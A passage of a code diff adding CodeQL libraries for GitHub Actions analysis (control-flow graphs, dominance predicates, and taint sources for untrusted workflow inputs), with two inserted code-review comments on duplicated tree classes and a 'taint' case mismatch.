+ * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 immediately dominates the + * basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block). + */ + predicate immediatelyDominates(BasicBlock bb) { bbIDominates(this, bb) } + + /** + * Holds if this basic block strictly dominates basic block `bb`. + * + * That is, all paths reaching basic block `bb` from some entry point + * basic block must go through this basic block (which must be different + * from `bb`). + * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 strictly dominates the + * basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block). + */ + predicate strictlyDominates(BasicBlock bb) { bbIDominates+(this, bb) } + + /** + * Holds if this basic block dominates basic block `bb`. + * + * That is, all paths reaching basic block `bb` from some entry point + * basic block must go through this basic block. + * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 dominates the basic + * basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block). + */ + predicate dominates(BasicBlock bb) { + bb = this or + this.strictlyDominates(bb) + } + + /** + * Holds if `df` is in the dominance frontier of this basic block. + * That is, this basic block dominates a predecessor of `df`, but + * does not dominate `df` itself. 
+ * + * Example: + * + * ```rb + * def m x + * if x < 0 + * x = -x + * if x > 10 + * x = x - 1 + * end + * end + * puts x + * end + * ``` + * + * The basic block on line 8 is in the dominance frontier + * of the basic block starting on line 3 because that block + * dominates the basic block on line 4, which is a predecessor of + * `puts x`. Also, the basic block starting on line 3 does not + * dominate the basic block on line 8. + */ + predicate inDominanceFrontier(BasicBlock df) { + this.dominatesPredecessor(df) and + not this.strictlyDominates(df) + } + + /** + * Holds if this basic block dominates a predecessor of `df`. + */ + private predicate dominatesPredecessor(BasicBlock df) { this.dominates(df.getAPredecessor()) } + + /** + * Gets the basic block that immediately dominates this basic block, if any. + * + * That is, all paths reaching this basic block from some entry point + * basic block must go through the result, which is an immediate basic block + * predecessor of this basic block. + * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 is an immediate dominator of + * the basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block, and the `if` block + * is an immediate predecessor of `return 1`). + */ + BasicBlock getImmediateDominator() { bbIDominates(result, this) } + + /** + * Holds if this basic block strictly post-dominates basic block `bb`. + * + * That is, all paths reaching a normal exit point basic block from basic + * block `bb` must go through this basic block (which must be different + * from `bb`). + * + * Example: + * + * ```rb + * def m b + * if b + * puts "b" + * end + * puts "m" + * end + * ``` + * + * The basic block on line 5 strictly post-dominates the basic block on + * line 3 (all paths to the exit point of `m` from `puts "b"` must go + * through `puts "m"`). 
+ */ + predicate strictlyPostDominates(BasicBlock bb) { bbIPostDominates+(this, bb) } + + /** + * Holds if this basic block post-dominates basic block `bb`. + * + * That is, all paths reaching a normal exit point basic block from basic + * block `bb` must go through this basic block. + * + * Example: + * + * ```rb + * def m b + * if b + * puts "b" + * end + * puts "m" + * end + * ``` + * + * The basic block on line 5 post-dominates the basic block on line 3 + * (all paths to the exit point of `m` from `puts "b"` must go through + * `puts "m"`). + */ + predicate postDominates(BasicBlock bb) { + this.strictlyPostDominates(bb) or + this = bb + } + + /** Holds if this basic block is in a loop in the control flow graph. */ + predicate inLoop() { this.getASuccessor+() = this } + + /** Gets a textual representation of this basic block. */ + string toString() { result = this.getFirstNode().toString() } + + /** Gets the location of this basic block. */ + Location getLocation() { result = this.getFirstNode().getLocation() } +} + +cached +private module Cached { + /** Internal representation of basic blocks. */ + cached + newtype TBasicBlock = TBasicBlockStart(Node cfn) { startsBB(cfn) } + + /** Holds if `cfn` starts a new basic block. */ + private predicate startsBB(Node cfn) { + not exists(cfn.getAPredecessor()) and exists(cfn.getASuccessor()) + or + cfn.isJoin() + or + cfn.getAPredecessor().isBranch() + or + /* + * In cases such as + * + * ```rb + * if x or y + * foo + * else + * bar + * ``` + * + * we have a CFG that looks like + * + * x --false--> [false] x or y --false--> bar + * \ | + * --true--> y --false-- + * \ + * --true--> [true] x or y --true--> foo + * + * and we want to ensure that both `foo` and `bar` start a new basic block, + * in order to get a `ConditionalBlock` out of the disjunction. + */ + + exists(cfn.getAPredecessor(any(BooleanSuccessor s))) + } + + /** + * Holds if `succ` is a control flow successor of `pred` within + * the same basic block. 
+ */ + private predicate intraBBSucc(Node pred, Node succ) { + succ = pred.getASuccessor() and + not startsBB(succ) + } + + /** + * Holds if `cfn` is the `i`th node in basic block `bb`. + * + * In other words, `i` is the shortest distance from a node `bb` + * that starts a basic block to `cfn` along the `intraBBSucc` relation. + */ + cached + predicate bbIndex(Node bbStart, Node cfn, int i) = + shortestDistances(startsBB/1, intraBBSucc/2)(bbStart, cfn, i) + + /** + * Holds if the first node of basic block `succ` is a control flow + * successor of the last node of basic block `pred`. + */ + private predicate succBB(BasicBlock pred, BasicBlock succ) { succ = pred.getASuccessor() } + + /** Holds if `dom` is an immediate dominator of `bb`. */ + cached + predicate bbIDominates(BasicBlock dom, BasicBlock bb) = + idominance(entryBB/1, succBB/2)(_, dom, bb) + + /** Holds if `pred` is a basic block predecessor of `succ`. */ + private predicate predBB(BasicBlock succ, BasicBlock pred) { succBB(pred, succ) } + + /** Holds if `bb` is an exit basic block that represents normal exit. */ + private predicate normalExitBB(BasicBlock bb) { bb.getANode().(AnnotatedExitNode).isNormal() } + + /** Holds if `dom` is an immediate post-dominator of `bb`. */ + cached + predicate bbIPostDominates(BasicBlock dom, BasicBlock bb) = + idominance(normalExitBB/1, predBB/2)(_, dom, bb) + + /** + * Gets the `i`th predecessor of join block `jb`, with respect to some + * arbitrary order. 
+ */ + cached + JoinBlockPredecessor getJoinBlockPredecessor(JoinBlock jb, int i) { + none() + /* + * result = + * rank[i + 1](JoinBlockPredecessor jbp | + * jbp = jb.getAPredecessor() + * | + * jbp order by JoinBlockPredecessors::getId(jbp), JoinBlockPredecessors::getSplitString(jbp) + * ) + */ + + } + + cached + predicate immediatelyControls(ConditionBlock cb, BasicBlock succ, BooleanSuccessor s) { + succ = cb.getASuccessor(s) and + forall(BasicBlock pred | pred = succ.getAPredecessor() and pred != cb | succ.dominates(pred)) + } + + cached + predicate controls(ConditionBlock cb, BasicBlock controlled, BooleanSuccessor s) { + exists(BasicBlock succ | cb.immediatelyControls(succ, s) | succ.dominates(controlled)) + } +} + +private import Cached + +/** Holds if `bb` is an entry basic block. */ +private predicate entryBB(BasicBlock bb) { bb.getFirstNode() instanceof EntryNode } + +/** + * An entry basic block, that is, a basic block whose first node is + * an entry node. + */ +class EntryBasicBlock extends BasicBlock { + EntryBasicBlock() { entryBB(this) } +} + +/** + * An annotated exit basic block, that is, a basic block whose last node is + * an annotated exit node. + */ +class AnnotatedExitBasicBlock extends BasicBlock { + private boolean normal; + + AnnotatedExitBasicBlock() { + exists(AnnotatedExitNode n | + n = this.getANode() and + if n.isNormal() then normal = true else normal = false + ) + } + + /** Holds if this block represent a normal exit. */ + final predicate isNormal() { normal = true } +} + +/** + * An exit basic block, that is, a basic block whose last node is + * an exit node. 
+ */ +class ExitBasicBlock extends BasicBlock { + ExitBasicBlock() { this.getLastNode() instanceof ExitNode } +} + +/* + * private module JoinBlockPredecessors { + * private predicate id(AstNode x, AstNode y) { x = y } + * + * private predicate idOf(AstNode x, int y) = equivalenceRelation(id/2)(x, y) + * + * int getId(JoinBlockPredecessor jbp) { + * idOf(Ast::toTreeSitter(jbp.getFirstNode().(AstCfgNode).getAstNode()), result) + * or + * idOf(Ast::toTreeSitter(jbp.(EntryBasicBlock).getScope()), result) + * } + * + * string getSplitString(JoinBlockPredecessor jbp) { + * result = jbp.getFirstNode().(AstCfgNode).getSplitsString() + * or + * not exists(jbp.getFirstNode().(AstCfgNode).getSplitsString()) and + * result = "" + * } + * } + */ + +/** A basic block with more than one predecessor. */ +class JoinBlock extends BasicBlock { + JoinBlock() { this.getFirstNode().isJoin() } + + /** + * Gets the `i`th predecessor of this join block, with respect to some + * arbitrary order. + */ + JoinBlockPredecessor getJoinBlockPredecessor(int i) { result = getJoinBlockPredecessor(this, i) } +} + +/** A basic block that is an immediate predecessor of a join block. */ +class JoinBlockPredecessor extends BasicBlock { + JoinBlockPredecessor() { this.getASuccessor() instanceof JoinBlock } +} + +/** A basic block that terminates in a condition, splitting the subsequent control flow. */ +class ConditionBlock extends BasicBlock { + ConditionBlock() { this.getLastNode().isCondition() } + + /** + * Holds if basic block `succ` is immediately controlled by this basic + * block with conditional value `s`. That is, `succ` is an immediate + * successor of this block, and `succ` can only be reached from + * the callable entry point by going via the `s` edge out of this basic block. 
+ */ + predicate immediatelyControls(BasicBlock succ, BooleanSuccessor s) { + immediatelyControls(this, succ, s) + } + + /** + * Holds if basic block `controlled` is controlled by this basic block with + * conditional value `s`. That is, `controlled` can only be reached from + * the callable entry point by going via the `s` edge out of this basic block. + */ + predicate controls(BasicBlock controlled, BooleanSuccessor s) { controls(this, controlled, s) } +} diff --git a/actions/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/actions/ql/lib/codeql/actions/controlflow/internal/Cfg.qll new file mode 100644 index 000000000000..318cd2820a35 --- /dev/null +++ b/actions/ql/lib/codeql/actions/controlflow/internal/Cfg.qll 
@@ -0,0 +1,316 @@ +private import codeql.actions.Ast +private import codeql.controlflow.Cfg as CfgShared +private import codeql.Locations + +module Completion { + private newtype TCompletion = + TSimpleCompletion() or + TBooleanCompletion(boolean b) { b in [false, true] } or + TReturnCompletion() + + abstract class Completion extends TCompletion { + abstract string toString(); + + predicate isValidForSpecific(AstNode e) { none() } + + predicate isValidFor(AstNode e) { this.isValidForSpecific(e) } + + abstract SuccessorType getAMatchingSuccessorType(); + } + + abstract class NormalCompletion extends Completion { } + + class SimpleCompletion extends NormalCompletion, TSimpleCompletion { + override string toString() { result = "SimpleCompletion" } + + override predicate isValidFor(AstNode e) { not any(Completion c).isValidForSpecific(e) } + + override NormalSuccessor getAMatchingSuccessorType() { any() } + } + + class BooleanCompletion extends NormalCompletion, TBooleanCompletion { + boolean value; + + BooleanCompletion() { this = TBooleanCompletion(value) } + + override string toString() { result = "BooleanCompletion(" + value + ")" } + + override predicate isValidForSpecific(AstNode e) { none() } + + override BooleanSuccessor getAMatchingSuccessorType() { result.getValue() = value } + + final boolean getValue() { result = value } + } + + class ReturnCompletion extends Completion, TReturnCompletion { + override string toString() { result = "ReturnCompletion" } + + override predicate isValidForSpecific(AstNode e) { none() } + + override ReturnSuccessor getAMatchingSuccessorType() { any() } + } + + cached + private newtype TSuccessorType = + TNormalSuccessor() or + TBooleanSuccessor(boolean b) { b in [false, true] } or + TReturnSuccessor() + + class SuccessorType extends TSuccessorType { + string toString() { none() } + } + + class NormalSuccessor extends SuccessorType, TNormalSuccessor { + override string toString() { result = "successor" } + } + + class 
BooleanSuccessor extends SuccessorType, TBooleanSuccessor { + boolean value; + + BooleanSuccessor() { this = TBooleanSuccessor(value) } + + override string toString() { result = value.toString() } + + boolean getValue() { result = value } + } + + class ReturnSuccessor extends SuccessorType, TReturnSuccessor { + override string toString() { result = "return" } + } +} + +module CfgScope { + abstract class CfgScope extends AstNode { } + + class WorkflowScope extends CfgScope instanceof Workflow { } + + class CompositeActionScope extends CfgScope instanceof CompositeAction { } +} + +private module Implementation implements CfgShared::InputSig { + import codeql.actions.Ast + import Completion + import CfgScope + + predicate completionIsNormal(Completion c) { not c instanceof ReturnCompletion } + + // Not using CFG splitting, so the following are just dummy types. + private newtype TUnit = Unit() + + additional class SplitKindBase = TUnit; + + additional class Split extends TUnit { + abstract string toString(); + } + + predicate completionIsSimple(Completion c) { c instanceof SimpleCompletion } + + predicate completionIsValidFor(Completion c, AstNode e) { c.isValidFor(e) } + + CfgScope getCfgScope(AstNode e) { + exists(AstNode p | p = e.getParentNode() | + result = p + or + not p instanceof CfgScope and result = getCfgScope(p) + ) + } + + additional int maxSplits() { result = 0 } + + predicate scopeFirst(CfgScope scope, AstNode e) { + first(scope.(Workflow), e) or + first(scope.(CompositeAction), e) + } + + predicate scopeLast(CfgScope scope, AstNode e, Completion c) { + last(scope.(Workflow), e, c) or + last(scope.(CompositeAction), e, c) + } + + predicate successorTypeIsSimple(SuccessorType t) { t instanceof NormalSuccessor } + + predicate successorTypeIsCondition(SuccessorType t) { t instanceof BooleanSuccessor } + + SuccessorType getAMatchingSuccessorType(Completion c) { result = c.getAMatchingSuccessorType() } + + predicate isAbnormalExitType(SuccessorType t) { 
none() } +} + +module CfgImpl = CfgShared::Make; + +private import CfgImpl +private import Completion +private import CfgScope + +private class CompositeActionTree extends StandardPreOrderTree instanceof CompositeAction { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](AstNode child, Location l | + ( + child = this.(CompositeAction).getAnInput() or + child = this.(CompositeAction).getOutputs() or + child = this.(CompositeAction).getRuns() + ) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class RunsTree extends StandardPreOrderTree instanceof Runs { + override ControlFlowTree getChildNode(int i) { result = super.getStep(i) } +} + +private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { + override ControlFlowTree getChildNode(int i) { + if this instanceof ReusableWorkflow + then + result = + rank[i](AstNode child, Location l | + ( + child = this.(ReusableWorkflow).getAnInput() or + child = this.(ReusableWorkflow).getOutputs() or + child = this.(ReusableWorkflow).getStrategy() or + child = this.(ReusableWorkflow).getAJob() + ) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + else + result = + rank[i](AstNode child, Location l | + ( + child = super.getStrategy() or + child = super.getAJob() + ) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class OutputsTree extends StandardPreOrderTree instanceof Outputs { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](AstNode child, Location l | + child = super.getAnOutputExpr() and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + 
+private class StrategyTree extends StandardPreOrderTree instanceof Strategy { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](AstNode child, Location l | + child = super.getAMatrixVarExpr() and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class JobTree extends StandardPreOrderTree instanceof LocalJob { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](AstNode child, Location l | + ( + child = super.getAStep() or + child = super.getOutputs() or + child = super.getStrategy() + ) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class ExternalJobTree extends StandardPreOrderTree instanceof ExternalJob { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](AstNode child, Location l | + ( + child = super.getArgumentExpr(_) or + child = super.getInScopeEnvVarExpr(_) or + child = super.getOutputs() or + child = super.getStrategy() + ) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class UsesTree extends StandardPreOrderTree instanceof UsesStep { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](AstNode child, Location l | + (child = super.getArgumentExpr(_) or child = super.getInScopeEnvVarExpr(_)) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class RunTree extends StandardPreOrderTree instanceof Run { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](AstNode child, Location l | + ( + child = super.getInScopeEnvVarExpr(_) or + child = super.getAnScriptExpr() or + child = super.getScript() + ) and + l = 
child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class ScalarValueTree extends StandardPreOrderTree instanceof ScalarValue { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + child = super.getAChildNode() and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class UsesLeaf extends LeafTree instanceof Uses { } + +private class InputTree extends LeafTree instanceof Input { } + +private class ScalarValueLeaf extends LeafTree instanceof ScalarValue { } + +private class ExpressionLeaf extends LeafTree instanceof Expression { } diff --git a/actions/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/actions/ql/lib/codeql/actions/dataflow/ExternalFlow.qll new file mode 100644 index 000000000000..2914dac5f0a6 --- /dev/null +++ b/actions/ql/lib/codeql/actions/dataflow/ExternalFlow.qll 
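Review bot: `ScalarValue` is registered twice, as `ScalarValueTree` (a `StandardPreOrderTree` whose children are `super.getAChildNode()`) and as `ScalarValueLeaf` (a `LeafTree`), so the same AST node gets two `last` definitions; if the shared library's `last` is disjunctive, a scalar with child expressions would get an exit edge from itself in addition to the one from its last child. A `StandardPreOrderTree` with no children already behaves as a leaf, so `ScalarValueLeaf` looks redundant and could be dropped — please confirm against the CFG tests. Separately, the `rank[i](AstNode child, Location l | ... | child order by l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString())` expression is copied into eight `getChildNode` overrides; a private helper taking the candidate-child relation would remove the duplication, and comparing the end column before the end line reads as a slip that the helper would fix in one place.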
@@ -0,0 +1,131 @@
+private import actions
+private import internal.ExternalFlowExtensions as Extensions
+private import codeql.actions.DataFlow
+private import codeql.actions.security.ArtifactPoisoningQuery
+
+/**
+ * MaD sources
+ * Fields:
+ * - action: Fully-qualified action name (NWO)
+ * - version: Either '*' or a specific SHA/Tag
+ * - output arg: To node (prefixed with either `env.` or `output.`)
+ * - provenance: verification of the model
+ */
+predicate actionsSourceModel(
+ string action, string version, string output, string kind, string provenance
+) {
+ Extensions::actionsSourceModel(action, version, output, kind, provenance)
+}
+
+/**
+ * MaD summaries
+ * Fields:
+ * - action: Fully-qualified action name (NWO)
+ * - version: Either '*' or a specific SHA/Tag
+ * - input arg: From node (prefixed with either `env.` or `input.`)
+ * - output arg: To node (prefixed with either `env.` or `output.`)
+ * - kind: Either 'Taint' or 'Value'
+ * - provenance: verification of the model
+ */
+predicate actionsSummaryModel(
+ string action, string version, string input, string output, string kind, string provenance
+) {
+ Extensions::actionsSummaryModel(action, version, input, output, kind, provenance)
+}
+
+/**
+ * MaD sinks
+ * Fields:
+ * - action: Fully-qualified action name (NWO)
+ * - version: Either '*' or a specific SHA/Tag
+ * - input: sink node (prefixed with either `env.` or `input.`)
+ * - kind: sink kind
+ * - provenance: verification of the model
+ */
+predicate actionsSinkModel(
+ string action, string version, string input, string kind, string provenance
+) {
+ Extensions::actionsSinkModel(action, version, input, kind, provenance)
+}
+
+/**
+ * Holds if source.fieldName is a MaD-defined source of a given taint kind.
+ */ +predicate madSource(DataFlow::Node source, string kind, string fieldName) { + exists(Uses uses, string action, string version | + actionsSourceModel(action, version, fieldName, kind, _) and + uses.getCallee() = action.toLowerCase() and + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.trim() + ) and + ( + if fieldName.trim().matches("env.%") + then source.asExpr() = uses.getInScopeEnvVarExpr(fieldName.trim().replaceAll("env.", "")) + else + if fieldName.trim().matches("output.%") + then source.asExpr() = uses + else none() + ) + ) +} + +/** + * Holds if the data flow from `pred` to `succ` is a MaD store step. + */ +predicate madStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(Uses uses, string action, string version, string input, string output | + actionsSummaryModel(action, version, input, output, "taint", _) and + c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and + uses.getCallee() = action.toLowerCase() and + // version check + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.trim() + ) and + // pred provenance + ( + input.trim().matches("env.%") and + pred.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) + or + input.trim().matches("input.%") and + pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + or + input.trim() = "artifact" and + exists(UntrustedArtifactDownloadStep download | + pred.asExpr() = download and + download.getAFollowingStep() = uses + ) + ) and + succ.asExpr() = uses + ) +} + +/** + * Holds if sink is a MaD-defined sink for a given taint kind. 
+ */
+predicate madSink(DataFlow::Node sink, string kind) {
+ exists(Uses uses, string action, string version, string input |
+ actionsSinkModel(action, version, input, kind, _) and
+ uses.getCallee() = action.toLowerCase() and
+ // version check
+ (
+ if version.trim() = "*"
+ then uses.getVersion() = any(string v)
+ else uses.getVersion() = version.trim()
+ ) and
+ // pred provenance
+ (
+ input.trim().matches("env.%") and
+ sink.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", ""))
+ or
+ input.trim().matches("input.%") and
+ sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", ""))
+ or
+ input.trim() = "artifact" and
+ sink.asExpr() = uses
+ )
+ )
+}
diff --git a/actions/ql/lib/codeql/actions/dataflow/FlowSources.qll b/actions/ql/lib/codeql/actions/dataflow/FlowSources.qll
new file mode 100644
index 000000000000..df3d513d0050
--- /dev/null
+++ b/actions/ql/lib/codeql/actions/dataflow/FlowSources.qll
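Review bot: `madStoreStep` only consumes summaries whose kind is exactly `"taint"` (`actionsSummaryModel(action, version, input, output, "taint", _)`), but the `actionsSummaryModel` QLDoc above documents the field as `Either 'Taint' or 'Value'`; if the extension rows use the capitalised spelling nothing matches, and `Value` rows are never consumed anywhere in this file. Either lower-case the documented values or compare `kind.toLowerCase() = "taint"`, and state what happens to value summaries. In `madSource`, the `output.%` branch binds `source.asExpr() = uses`, i.e. the whole step rather than the named output, so a model for `output.foo` also marks reads of every other output of that step unless a later step filters on `fieldName`; a comment saying this is intentional, or a `FieldContent` restriction, would help. The `actionsSourceModel` QLDoc also omits the `kind` parameter that the `actionsSinkModel` QLDoc lists.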
@@ -0,0 +1,366 @@ +private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery +private import codeql.actions.config.Config +private import codeql.actions.dataflow.ExternalFlow + +/** + * A data flow source. + */ +abstract class SourceNode extends DataFlow::Node { + /** + * Gets a string that represents the source kind with respect to threat modeling. + */ + abstract string getThreatModel(); +} + +/** A data flow source of remote user input. */ +abstract class RemoteFlowSource extends SourceNode { + /** Gets a string that describes the type of this remote flow source. */ + abstract string getSourceType(); + + /** Gets the event that triggered the source. */ + abstract string getEventName(); + + override string getThreatModel() { result = "remote" } +} + +/** + * A data flow source of user input from github context. + * eg: github.head_ref + */ +class GitHubCtxSource extends RemoteFlowSource { + string flag; + string event; + GitHubExpression e; + + GitHubCtxSource() { + this.asExpr() = e and + // github.head_ref + e.getFieldName() = "head_ref" and + flag = "branch" and + ( + event = e.getATriggerEvent().getName() and + event = "pull_request_target" + or + not exists(e.getATriggerEvent()) and + event = "unknown" + ) + } + + override string getSourceType() { result = flag } + + override string getEventName() { result = event } +} + +class GitHubEventCtxSource extends RemoteFlowSource { + string flag; + string context; + string event; + + GitHubEventCtxSource() { + exists(Expression e, string regexp | + this.asExpr() = e and + context = e.getExpression() and + ( + // the context is available for the job trigger events + event = e.getATriggerEvent().getName() and + exists(string context_prefix | + contextTriggerDataModel(event, context_prefix) and + normalizeExpr(context).matches("%" + context_prefix + "%") + ) + or + not exists(e.getATriggerEvent()) and + event = "unknown" + ) and + 
untrustedEventPropertiesDataModel(regexp, flag) and + not flag = "json" and + normalizeExpr(context).regexpMatch("(?i)\\s*" + wrapRegexp(regexp) + ".*") + ) + } + + override string getSourceType() { result = flag } + + string getContext() { result = context } + + override string getEventName() { result = event } +} + +abstract class CommandSource extends RemoteFlowSource { + abstract string getCommand(); + + abstract Run getEnclosingRun(); + + override string getEventName() { result = this.getEnclosingRun().getATriggerEvent().getName() } +} + +class GitCommandSource extends RemoteFlowSource, CommandSource { + Run run; + string cmd; + string flag; + + GitCommandSource() { + exists(Step checkout, string cmd_regex | + checkout instanceof SimplePRHeadCheckoutStep and + this.asExpr() = run.getScript() and + checkout.getAFollowingStep() = run and + run.getScript().getAStmt() = cmd and + cmd.indexOf("git") = 0 and + untrustedGitCommandDataModel(cmd_regex, flag) and + cmd.regexpMatch(cmd_regex + ".*") + ) + } + + override string getSourceType() { result = flag } + + override string getCommand() { result = cmd } + + override Run getEnclosingRun() { result = run } +} + +class GhCLICommandSource extends RemoteFlowSource, CommandSource { + Run run; + string cmd; + string flag; + + GhCLICommandSource() { + exists(string cmd_regex | + this.asExpr() = run.getScript() and + run.getScript().getAStmt() = cmd and + cmd.indexOf("gh ") = 0 and + untrustedGhCommandDataModel(cmd_regex, flag) and + cmd.regexpMatch(cmd_regex + ".*") and + ( + cmd.regexpMatch(".*\\b(pr|pulls)\\b.*") and + run.getATriggerEvent().getName() = checkoutTriggers() + or + not cmd.regexpMatch(".*\\b(pr|pulls)\\b.*") + ) + ) + } + + override string getSourceType() { result = flag } + + override Run getEnclosingRun() { result = run } + + override string getCommand() { result = cmd } +} + +class GitHubEventPathSource extends RemoteFlowSource, CommandSource { + string cmd; + string flag; + string access_path; + Run 
run; + + // Examples + // COMMENT_AUTHOR=$(jq -r .comment.user.login "$GITHUB_EVENT_PATH") + // CURRENT_COMMENT=$(jq -r .comment.body "$GITHUB_EVENT_PATH") + // PR_HEAD=$(jq --raw-output .pull_request.head.ref ${GITHUB_EVENT_PATH}) + // PR_NUMBER=$(jq --raw-output .pull_request.number ${GITHUB_EVENT_PATH}) + // PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) + // BODY=$(jq -r '.issue.body' "$GITHUB_EVENT_PATH" | sed -n '3p') + GitHubEventPathSource() { + this.asExpr() = run.getScript() and + run.getScript().getACommand() = cmd and + cmd.matches("jq%") and + cmd.matches("%GITHUB_EVENT_PATH%") and + exists(string regexp | + untrustedEventPropertiesDataModel(regexp, flag) and + not flag = "json" and + access_path = "github.event" + cmd.regexpCapture(".*\\s+([^\\s]+)\\s+.*", 1) and + normalizeExpr(access_path).regexpMatch("(?i)\\s*" + wrapRegexp(regexp) + ".*") + ) + } + + override string getSourceType() { result = flag } + + override string getCommand() { result = cmd } + + override Run getEnclosingRun() { result = run } +} + +class GitHubEventJsonSource extends RemoteFlowSource { + string flag; + string event; + + GitHubEventJsonSource() { + exists(Expression e, string context, string regexp | + this.asExpr() = e and + context = e.getExpression() and + untrustedEventPropertiesDataModel(regexp, _) and + ( + // only contexts for the triggering events are considered tainted. 
+ // eg: for `pull_request`, we only consider `github.event.pull_request` + event = e.getEnclosingWorkflow().getATriggerEvent().getName() and + exists(string context_prefix | + contextTriggerDataModel(event, context_prefix) and + normalizeExpr(context).matches("%" + context_prefix + "%") + ) and + normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(regexp) + ".*") + or + // github.event is tainted for all triggers + event = e.getEnclosingWorkflow().getATriggerEvent().getName() and + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and + normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp("\\bgithub.event\\b") + ".*") + or + not exists(e.getATriggerEvent()) and + event = "unknown" + ) and + flag = "json" + ) + } + + override string getSourceType() { result = flag } + + override string getEventName() { result = event } +} + +/** + * A Source of untrusted data defined in a MaD specification + */ +class MaDSource extends RemoteFlowSource { + string sourceType; + + MaDSource() { madSource(this, sourceType, _) } + + override string getSourceType() { result = sourceType } + + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } +} + +abstract class FileSource extends RemoteFlowSource { } + +/** + * A downloaded artifact. + */ +class ArtifactSource extends RemoteFlowSource, FileSource { + ArtifactSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } + + override string getSourceType() { result = "artifact" } + + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } +} + +/** + * A file from an untrusted checkout. 
+ */ +private class CheckoutSource extends RemoteFlowSource, FileSource { + CheckoutSource() { this.asExpr() instanceof SimplePRHeadCheckoutStep } + + override string getSourceType() { result = "artifact" } + + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } +} + +/** + * A list of file names returned by dorny/paths-filter. + */ +class DornyPathsFilterSource extends RemoteFlowSource { + DornyPathsFilterSource() { + exists(UsesStep u | + u.getCallee() = "dorny/paths-filter" and + u.getArgument("list-files") = ["csv", "json"] and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "filename" } + + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } +} + +/** + * A list of file names returned by tj-actions/changed-files. + */ +class TJActionsChangedFilesSource extends RemoteFlowSource { + TJActionsChangedFilesSource() { + exists(UsesStep u, string vulnerable_action, string vulnerable_version, string vulnerable_sha | + vulnerableActionsDataModel(vulnerable_action, vulnerable_version, vulnerable_sha, _) and + u.getCallee() = "tj-actions/changed-files" and + u.getCallee() = vulnerable_action and + ( + u.getArgument("safe_output") = "false" + or + (u.getVersion() = vulnerable_version or u.getVersion() = vulnerable_sha) + ) and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "filename" } + + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } +} + +/** + * A list of file names returned by tj-actions/verify-changed-files. 
